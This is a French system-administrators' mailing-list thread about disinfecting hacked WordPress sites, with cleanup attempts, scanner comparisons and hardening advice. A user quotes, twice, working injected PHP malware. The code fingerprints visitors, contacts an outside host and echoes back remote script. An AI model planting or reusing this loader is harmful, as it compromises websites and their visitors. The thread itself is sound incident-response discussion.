<?php #568ba2# error_reporting(0); @ini_set('display_errors',0); $wp_f67188 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #458ba2# ?>
Ou encore
<?php #5a9312# if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #/5a9312# ?>
J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe pour arrive a faire un truc propre.
find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*# *?>//g'
Le seul point commun est un début <?php saute de ligne puis un # et en fin un autre # saute de ligne ?>
J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
Mais cela ne semble mal fonctionner avec mon problème.
Auriez vous une idée ?
Merci
Pierre
Le 20/05/2015 16:09, Julien Escario a écrit :
Le 20/05/2015 07:14, Jonathan Leroy a écrit :
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites.
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Nice job !
Merci du retour. Julien
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
UTF8 -> latin_1 ca fonctionne mieux.
Le 03/06/2015 12:40, Pierre a écrit :
Yes c’était fait, En soit le hacker ne pouvait pas vraiment utiliser les scripts.
Mais il faut nettoyer.
Après une longe matinée de recherche j'ai trouvé ce script :
https://www.ask-sheldon.com/find-and-replace-malware-code-blocks-in-php-file...
Mais j'ai un problème d'encodage UTF8 et j'avoue que je ne m'y connais pas grand chose en python
Voici l'erreur que cela fait quand il trouvé un fichier infecté :
HIT Traceback (most recent call last): File "./remove.py", line 38, in <module> replaceStringInFile(os.path.join(directory, filename)) File "./remove.py", line 19, in replaceStringInFile fContent = unicode(inputFile.read(), "utf-8") UnicodeDecodeError: 'utf8' codec can't decode byte 0xe9 in position 255: invalid continuation byte
Merci
Pierre
En soit le pi Le 03/06/2015 12:02, Guillaume Tournat a écrit :
Fait déjà commencer par désactiver certaines fonctionnalités dangereuses dans php (disabled_functions dans php.ini)
Ensuite bloquer les requêtes http sortantes du serveur avec iptables.
Le 3 juin 2015 à 11:23, Pierre pierre@infoserver4u.fr a écrit :
Hello,
Je me permet de relancer la discutions car j'ai presque le même problème avec un client.
Sauf que le code change sur presque tout les fichiers.
Voici un exemple de code :
<?php #568ba2# error_reporting(0); @ini_set('display_errors',0); $wp_f67188 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #458ba2# ?>
Ou encore
<?php #5a9312# if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #/5a9312# ?>
J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe pour arrive a faire un truc propre.
find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*# *?>//g'
Le seul point commun est un début <?php saute de ligne puis un # et en fin un autre # saute de ligne ?>
J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
Mais cela ne semble mal fonctionner avec mon problème.
Auriez vous une idée ?
Merci
Pierre
Le 20/05/2015 16:09, Julien Escario a écrit :
Le 20/05/2015 07:14, Jonathan Leroy a écrit :
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites.
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Nice job !
Merci du retour. Julien
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
-
Bruno LEAL DE SOUSA -
Christophe Moille -
Florian Leleu -
Frédéric VANNIÈRE -
Gaetan Allart -
Guillaume Tournat -
Jeremie Le Hen -
Jonathan Leroy -
Julien Escario -
Matthieu Duchemin -
Maxence Dunnewind -
Patrice Guerlais -
Pierre -
Pierre-Yves Dubreucq